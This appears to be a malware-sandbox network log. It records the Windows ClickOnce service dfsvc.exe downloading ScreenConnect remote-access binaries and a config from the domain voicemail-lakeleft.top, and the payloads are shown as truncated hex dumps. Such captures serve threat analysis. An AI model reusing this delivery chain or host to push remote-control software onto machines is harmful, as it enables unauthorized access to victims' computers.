                                                                                                                                                                                                                                                                  6192.168.2.749760194.59.30.2014432628C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-11-08 10:09:32 UTC121OUTGET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1
                                                                                                                                                                                                                                                                  Host: voicemail-lakeleft.top
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                                                                                                  2024-11-08 10:09:32 UTC214INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Cache-Control: private
                                                                                                                                                                                                                                                                  Content-Length: 266
                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                  Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                  Date: Fri, 08 Nov 2024 10:09:32 GMT
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-11-08 10:09:32 UTC266INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e
                                                                                                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  7192.168.2.749771194.59.30.2014432628C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-11-08 10:09:33 UTC111OUTGET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1
                                                                                                                                                                                                                                                                  Host: voicemail-lakeleft.top
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                                                                                                  2024-11-08 10:09:34 UTC216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Cache-Control: private
                                                                                                                                                                                                                                                                  Content-Length: 81696
                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                  Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                  Date: Fri, 08 Nov 2024 10:09:33 GMT
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-11-08 10:09:34 UTC16168INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 50 da a7 bb 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 40 00 00 00 d4 00 00 00 00 00 00 e6 5e 00 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 01 00 00 02 00 00 6a 8b 01 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELP"0@^ `@ `j@
                                                                                                                                                                                                                                                                  2024-11-08 10:09:34 UTC16384INData Raw: 2d 34 35 32 62 2d 38 39 37 35 2d 37 34 61 38 35 38 32 38 64 33 35 34 00 00 13 01 00 02 00 00 00 04 54 65 78 74 05 53 74 61 74 65 00 00 08 01 00 0b 00 00 00 00 00 00 00 d2 59 fd a1 c3 db f8 b2 a8 38 41 41 b5 70 2f b9 70 e0 44 04 4a 6f 16 7f 54 f3 2d 91 6d bf ac 66 21 46 ef be d1 1e 85 dd 2b 75 b8 ff 7a 0d c8 39 d0 7b 2a 86 54 8d 79 d9 5d b2 8a 3c 12 a6 c1 3c 94 5c c5 c2 54 9b e5 b0 38 01 34 d6 47 4a 0b 62 7d 82 0a bc 8e 63 9f ae dc 13 7e 39 98 c7 b5 f2 fd 11 5b 4c 23 82 a4 fd 40 df 22 18 d8 3f 0b 56 59 b3 b5 88 4c 17 d4 e9 59 bc f3 d5 72 d6 78 1b 00 00 00 00 81 c5 e8 85 00 00 00 00 02 00 00 00 7b 00 00 00 18 5e 00 00 18 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 52 53 44 53 cb 4c a1 5b 4d 39 69 48 9a 46 34
                                                                                                                                                                                                                                                                  Data Ascii: -452b-8975-74a85828d354TextStateY8AAp/pDJoT-mf!F+uz9{*Ty]<<\T84GJb}c~9[L#@"?VYLYrx{^@RSDSL[M9iHF4
                                                                                                                                                                                                                                                                  2024-11-08 10:09:34 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 d2 ff ff 55 d1 fe ff 54 d0 fd ff 53 cf fb ff 52 cc f8 ff 51 c9 f4 ff 50 c6 f0 ff 4e c2 eb ff 4c bc e5 ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff 4c bc e5 ff 4e c2 eb ff 50 c6 f0 ff 51 c9 f4 ff 52 cc f8 ff 53 ce fa ff 54 d0 fd ff 55 d1 fe ff 55 d2 ff
                                                                                                                                                                                                                                                                  Data Ascii: UUTSRQPNL::::::::::::::::::::::::::::::::::::::LNPQRSTUU
                                                                                                                                                                                                                                                                  2024-11-08 10:09:34 UTC16384INData Raw: 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 00 00 00
                                                                                                                                                                                                                                                                  Data Ascii: fffffffffffffffgggggggggggggggggggggggggggggggggggggggggg
                                                                                                                                                                                                                                                                  2024-11-08 10:09:34 UTC16376INData Raw: 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 6e cd f3 ff 85 e0 ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 9a e5 ff ef 00 00 00 00 00 00 00 00 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 cf 00 9f e0 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9f e0 ef 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 cf 00 9f e0 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                  Data Ascii: n


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  8192.168.2.749779194.59.30.2014432628C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-11-08 10:09:35 UTC99OUTGET /Bin/ScreenConnect.Client.dll HTTP/1.1
                                                                                                                                                                                                                                                                  Host: voicemail-lakeleft.top
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                                                                                                  2024-11-08 10:09:35 UTC217INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Cache-Control: private
                                                                                                                                                                                                                                                                  Content-Length: 197120
                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                  Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                  Date: Fri, 08 Nov 2024 10:09:35 GMT
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-11-08 10:09:35 UTC16167INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5a 3c cd b8 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 fa 02 00 00 06 00 00 00 00 00 00 82 18 03 00 00 20 00 00 00 20 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 03 00 00 02 00 00 9e 14 03 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELZ<" 0 `@
                                                                                                                                                                                                                                                                  2024-11-08 10:09:35 UTC16384INData Raw: 00 0a 26 06 72 59 01 00 70 6f 76 00 00 0a 26 02 06 28 f6 02 00 06 2c 09 06 1f 20 6f 77 00 00 0a 26 06 1f 7d 6f 77 00 00 0a 26 06 6f 29 00 00 0a 2a 0a 16 2a 2e 02 03 28 f8 02 00 06 16 fe 01 2a 26 0f 00 03 28 fb 02 00 06 2a 0a 16 2a 5e 03 75 77 00 00 02 2c 0d 02 03 a5 77 00 00 02 28 fb 02 00 06 2a 16 2a 0a 17 2a 00 13 30 02 00 40 00 00 00 0c 00 00 11 73 75 00 00 0a 0a 06 72 c3 0f 00 70 6f 76 00 00 0a 26 06 72 59 01 00 70 6f 76 00 00 0a 26 02 06 28 fd 02 00 06 2c 09 06 1f 20 6f 77 00 00 0a 26 06 1f 7d 6f 77 00 00 0a 26 06 6f 29 00 00 0a 2a 0a 16 2a 2e 02 03 28 ff 02 00 06 16 fe 01 2a 26 0f 00 03 28 02 03 00 06 2a 0a 16 2a 5e 03 75 78 00 00 02 2c 0d 02 03 a5 78 00 00 02 28 02 03 00 06 2a 16 2a 0a 17 2a 00 13 30 02 00 40 00 00 00 0c 00 00 11 73 75 00 00 0a 0a
                                                                                                                                                                                                                                                                  Data Ascii: &rYpov&(, ow&}ow&o)**.(*&(**^uw,w(***0@surpov&rYpov&(, ow&}ow&o)**.(*&(**^ux,x(***0@su
                                                                                                                                                                                                                                                                  2024-11-08 10:09:35 UTC16384INData Raw: 04 02 7e 2c 02 00 0a 7d 06 01 00 04 02 15 7d 07 01 00 04 02 28 ef 00 00 0a 6f 2f 02 00 0a 7d 04 01 00 04 02 7b 04 01 00 04 03 06 7b 6b 01 00 04 6f 30 02 00 0a 06 7b 6b 01 00 04 6f 31 02 00 0a 6f 32 02 00 0a 02 7b 04 01 00 04 05 0e 04 6f 33 02 00 0a 02 7b 04 01 00 04 16 16 06 7b 6b 01 00 04 6f 30 02 00 0a 06 7b 6b 01 00 04 6f 31 02 00 0a 73 95 01 00 0a 06 fe 06 b5 04 00 06 73 34 02 00 0a 28 35 02 00 0a de 10 26 02 28 14 04 00 06 fe 1a 07 28 bd 00 00 0a dc 2a 00 00 00 01 1c 00 00 00 00 66 00 76 dc 00 09 16 00 00 01 02 00 1a 00 cb e5 00 07 00 00 00 00 1b 30 03 00 42 00 00 00 25 00 00 11 02 7b 03 01 00 04 0a 06 28 b8 00 00 0a 02 28 15 04 00 06 72 cb 17 00 70 18 28 36 02 00 0a 26 02 17 28 1e 04 00 06 de 19 02 7b 04 01 00 04 6f 37 02 00 0a 02 28 14 04 00 06 dc
                                                                                                                                                                                                                                                                  Data Ascii: ~,}}(o/}{{ko0{ko1o2{o3{{ko0{ko1ss4(5&((*fv0B%{((rp(6&({o7(
                                                                                                                                                                                                                                                                  2024-11-08 10:09:35 UTC16384INData Raw: 01 47 1f 16 00 f6 03 58 1f 16 00 30 07 69 1f 16 00 ab 08 47 1f 16 00 30 04 71 1f 16 00 4d 07 7b 1f 16 00 01 00 85 1f 16 00 3b 03 85 1f 06 00 ce 72 8e 1f 06 00 69 5c 9d 1d 06 00 ce 72 8e 1f 06 00 a5 75 8e 1d 01 00 e3 74 93 1f 01 00 e5 59 a9 10 01 00 50 37 99 1f 36 00 56 0a 9e 1f 16 00 8a 02 a3 1f 36 00 56 0a af 1f 16 00 a0 00 a3 1f 36 00 56 0a e6 11 16 00 70 00 dc 11 16 00 94 03 52 12 06 00 12 81 64 07 06 00 06 63 b4 11 06 00 7b 6d 0f 11 06 00 ce 72 b9 11 06 00 71 32 c6 11 06 00 9c 79 cb 11 06 00 90 83 a6 10 06 00 a9 62 2c 13 06 00 ce 72 b9 11 06 00 19 0d 58 04 06 00 26 77 b4 1f 06 00 ce 72 b9 1f 06 00 ac 65 7a 1e 06 00 7d 5d cb 11 36 00 56 0a be 1f 16 00 6c 01 c3 1f 06 00 ce 72 d5 1f 06 00 12 81 2a 1f 06 00 1a 63 da 1f 06 00 e4 7d 74 1d 06 00 79 59 ec 1f
                                                                                                                                                                                                                                                                  Data Ascii: GX0iG0qM{;ri\rutYP76V6V6VpRdc{mrq2yb,rX&wrez}]6Vlr*c}tyY
                                                                                                                                                                                                                                                                  2024-11-08 10:09:35 UTC16384INData Raw: b2 00 00 00 00 c4 01 1e 2a ce 2b e8 03 8c b2 00 00 00 00 94 00 7b 3e d8 2b e9 03 00 00 00 00 00 00 c4 05 42 64 e2 2b ea 03 2f b3 00 00 00 00 81 00 bc 71 e2 2b eb 03 50 b3 00 00 00 00 c4 00 58 10 d1 21 ec 03 a0 b9 00 00 00 00 81 00 81 2a e9 2b ed 03 08 ba 00 00 00 00 91 00 00 0f f8 2b f0 03 a0 ba 00 00 00 00 81 00 6a 09 08 2c f4 03 c0 ba 00 00 00 00 91 18 97 66 aa 20 f5 03 cc ba 00 00 00 00 86 18 91 66 01 00 f5 03 d4 ba 00 00 00 00 83 00 87 01 0f 2c f5 03 f3 ba 00 00 00 00 91 18 97 66 aa 20 f6 03 ff ba 00 00 00 00 86 18 91 66 01 00 f6 03 07 bb 00 00 00 00 83 00 3a 00 20 2c f6 03 0f bb 00 00 00 00 83 00 74 03 27 2c f7 03 17 bb 00 00 00 00 83 00 a3 01 78 29 f8 03 2a bb 00 00 00 00 86 18 91 66 01 00 f9 03 32 bb 00 00 00 00 83 00 b9 02 76 07 f9 03 56 bb 00 00
                                                                                                                                                                                                                                                                  Data Ascii: *+{>+Bd+/q+PX!*++j,f f,f f: ,t',x)*f2vV
                                                                                                                                                                                                                                                                  2024-11-08 10:09:35 UTC16384INData Raw: 1c 41 13 6b 00 a0 1c 60 13 6b 00 a0 1c 61 13 1a 00 db 2e 61 13 6b 00 a0 1c 80 13 6b 00 a0 1c a3 13 6b 00 a0 1c c3 13 6b 00 a0 1c e1 13 6b 00 a0 1c e3 13 6b 00 a0 1c 01 14 6b 00 a0 1c 03 14 6b 00 a0 1c 21 14 6b 00 a0 1c 41 14 6b 00 a0 1c 60 14 6b 00 a0 1c 61 14 6b 00 a0 1c 63 14 6b 00 a0 1c 81 14 6b 00 a0 1c 83 14 6b 00 a0 1c a0 14 6b 00 a0 1c a1 14 6b 00 a0 1c c1 14 6b 00 a0 1c c3 14 6b 00 a0 1c e1 14 6b 00 a0 1c e3 14 6b 00 a0 1c 01 15 6b 00 a0 1c 03 15 6b 00 a0 1c 21 15 6b 00 a0 1c 23 15 6b 00 a0 1c 41 15 1a 00 5c 2f 41 15 6b 00 a0 1c 44 15 c2 05 a0 1c 61 15 6b 00 a0 1c 63 15 6b 00 a0 1c 80 15 6b 00 a0 1c 81 15 6b 00 a0 1c 83 15 6b 00 a0 1c a0 15 6b 00 a0 1c a1 15 1a 00 db 2e a1 15 6b 00 a0 1c a3 15 6b 00 a0 1c c0 15 6b 00 a0 1c c1 15 6b 00 a0 1c c3 15
                                                                                                                                                                                                                                                                  Data Ascii: Ak`ka.akkkkkkkk!kAk`kakckkkkkkkkkkk!k#kA\/AkDakckkkkk.kkkk
                                                                                                                                                                                                                                                                  2024-11-08 10:09:35 UTC16384INData Raw: 52 65 71 75 65 73 74 49 44 00 3c 3e 4f 00 53 79 73 74 65 6d 2e 49 4f 00 3c 73 74 72 65 61 6d 49 44 3e 50 00 43 61 6c 63 75 6c 61 74 65 46 50 53 00 54 00 67 65 74 5f 58 00 74 69 6c 65 58 00 67 65 74 5f 59 00 74 69 6c 65 59 00 76 61 6c 75 65 5f 5f 00 55 6e 69 6f 6e 55 6e 6c 65 73 73 4e 6f 41 72 65 61 00 67 65 74 5f 44 61 74 61 00 73 65 74 5f 44 61 74 61 00 73 6f 75 6e 64 44 61 74 61 00 57 72 69 74 65 4d 65 73 73 61 67 65 44 61 74 61 00 67 65 74 5f 46 72 61 6d 65 44 61 74 61 00 73 65 74 5f 46 72 61 6d 65 44 61 74 61 00 53 69 67 6e 44 61 74 61 00 67 65 74 5f 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 44 61 74 61 00 73 65 74 5f 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 44 61 74 61 00 49 42 69 74 6d 61 70 44 61 74 61 00 62 69 74 6d 61 70 44 61 74 61 00 64 61 74
                                                                                                                                                                                                                                                                  Data Ascii: RequestID<>OSystem.IO<streamID>PCalculateFPSTget_XtileXget_YtileYvalue__UnionUnlessNoAreaget_Dataset_DatasoundDataWriteMessageDataget_FrameDataset_FrameDataSignDataget_AuthenticationDataset_AuthenticationDataIBitmapDatabitmapDatadat
                                                                                                                                                                                                                                                                  2024-11-08 10:09:35 UTC16384INData Raw: 6b 4d 6f 6e 69 74 6f 72 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 4f 70 65 6e 4d 6f 6e 69 74 6f 72 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6e 74 72 6f 6c 50 61 6e 65 6c 4d 65 73 73 61 67 65 73 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 53 65 6e 64 43 6c 69 70 62 6f 61 72 64 4b 65 79 73 74 72 6f 6b 65 73 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 53 65 6e 64 46 69 6c 65 73 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 52 65 63 65 69 76
                                                                                                                                                                                                                                                                  Data Ascii: kMonitor.pngScreenConnect.Properties.CommandOpenMonitor.pngScreenConnect.Properties.ControlPanelMessages.pngScreenConnect.Properties.CommandSendClipboardKeystrokes.pngScreenConnect.Properties.CommandSendFiles.pngScreenConnect.Properties.CommandReceiv
                                                                                                                                                                                                                                                                  2024-11-08 10:09:35 UTC16384INData Raw: 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 3b 53 00 65 00 6c 00 65 00 63 00 74 00 53 00 6f 00 75 00 6e 00 64 00 43 00 61 00 70 00 74 00 75 00 72 00 65 00 4d 00 6f 00 64 00 65 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 27 53 00 6f 00 75 00 6e 00 64 00 43 00 61 00 70 00 74 00 75 00 72 00 65 00 4d 00 6f 00 64 00 65 00 20 00 3d 00 20 00 00 2b 53 00 65 00 6c 00 65 00 63 00 74 00 53 00 70 00 65 00 61 00 6b 00 65 00 72 00 73 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 27 4d 00 75 00 74 00 65 00 53 00 70 00 65 00 61 00 6b 00 65 00 72 00 73 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 31 53 00 65 00 74 00 53 00 70 00 65 00 61 00 6b 00 65 00 72 00 73 00 56 00 6f 00 6c 00 75 00 6d 00 65 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 13 56 00 6f 00 6c 00
                                                                                                                                                                                                                                                                  Data Ascii: ommand;SelectSoundCaptureModeCommand'SoundCaptureMode = +SelectSpeakersCommand'MuteSpeakersCommand1SetSpeakersVolumeCommandVol
                                                                                                                                                                                                                                                                  2024-11-08 10:09:35 UTC16384INData Raw: 72 74 4d 69 6c 6c 69 73 65 63 6f 6e 64 43 6f 75 6e 74 13 57 61 73 4e 65 74 77 6f 72 6b 52 65 61 63 68 61 62 6c 65 13 57 61 73 48 61 6e 64 73 68 61 6b 65 53 74 61 72 74 65 64 15 57 61 73 48 61 6e 64 73 68 61 6b 65 43 6f 6d 70 6c 65 74 65 64 00 00 21 01 00 02 00 00 00 10 4d 65 74 72 69 63 73 45 6e 74 72 79 54 79 70 65 07 4d 69 6e 69 6d 75 6d 00 00 26 01 00 84 6b 00 00 02 00 54 02 0d 41 6c 6c 6f 77 4d 75 6c 74 69 70 6c 65 00 54 02 09 49 6e 68 65 72 69 74 65 64 00 26 01 00 4c 14 00 00 02 00 54 02 0d 41 6c 6c 6f 77 4d 75 6c 74 69 70 6c 65 00 54 02 09 49 6e 68 65 72 69 74 65 64 00 26 01 00 02 00 00 00 02 00 54 02 0d 41 6c 6c 6f 77 4d 75 6c 74 69 70 6c 65 00 54 02 09 49 6e 68 65 72 69 74 65 64 00 06 01 00 e4 00 00 00 06 01 00 48 00 00 00 06 01 00 49 00 00 00 06
                                                                                                                                                                                                                                                                  Data Ascii: rtMillisecondCountWasNetworkReachableWasHandshakeStartedWasHandshakeCompleted!MetricsEntryTypeMinimum&kTAllowMultipleTInherited&LTAllowMultipleTInherited&TAllowMultipleTInheritedHI


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  9192.168.2.749790194.59.30.2014432628C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-11-08 10:09:36 UTC106OUTGET /Bin/ScreenConnect.ClientService.dll HTTP/1.1
                                                                                                                                                                                                                                                                  Host: voicemail-lakeleft.top
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                                                                                                  2024-11-08 10:09:37 UTC216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Cache-Control: private
                                                                                                                                                                                                                                                                  Content-Length: 68096
                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                  Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                  Date: Fri, 08 Nov 2024 10:09:36 GMT
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-11-08 10:09:37 UTC16168INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 30 d8 54 90 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 02 01 00 00 06 00 00 00 00 00 00 ba 20 01 00 00 20 00 00 00 40 01 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 01 00 00 02 00 00 64 fa 01 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL0T" 0 @ d@
                                                                                                                                                                                                                                                                  2024-11-08 10:09:37 UTC16384INData Raw: 00 00 0a 07 6f 11 00 00 0a 2d d0 de 0a 07 2c 06 07 6f 10 00 00 0a dc 06 7b 54 00 00 04 6f 24 02 00 0a 13 04 2b 5a 11 04 6f 25 02 00 0a 13 05 02 7b 53 00 00 04 7b 0d 00 00 04 11 05 73 26 02 00 0a 25 02 7b 52 00 00 04 28 f8 00 00 0a 7e 30 00 00 04 25 2d 17 26 7e 2b 00 00 04 fe 06 6d 00 00 06 73 06 02 00 0a 25 80 30 00 00 04 28 5f 00 00 2b 6f 27 02 00 0a 73 81 00 00 0a 6f 82 00 00 0a 11 04 6f 11 00 00 0a 2d 9d de 0c 11 04 2c 07 11 04 6f 10 00 00 0a dc 2a 01 1c 00 00 02 00 65 00 34 99 00 0a 00 00 00 00 02 00 b0 00 67 17 01 0c 00 00 00 00 1e 02 28 1d 00 00 0a 2a 56 02 7b 54 00 00 04 03 6f 23 02 00 0a 6f 28 02 00 0a 16 fe 01 2a 1e 02 28 1d 00 00 0a 2a 4a 02 7b 56 00 00 04 6f 29 02 00 0a 03 28 2a 02 00 0a 2a 1e 02 28 1d 00 00 0a 2a 00 00 00 13 30 03 00 43 00 00
                                                                                                                                                                                                                                                                  Data Ascii: o-,o{To$+Zo%{S{s&%{R(~0%-&~+ms%0(_+o'soo-,o*e4g(*V{To#o(*(*J{Vo)(**(*0C
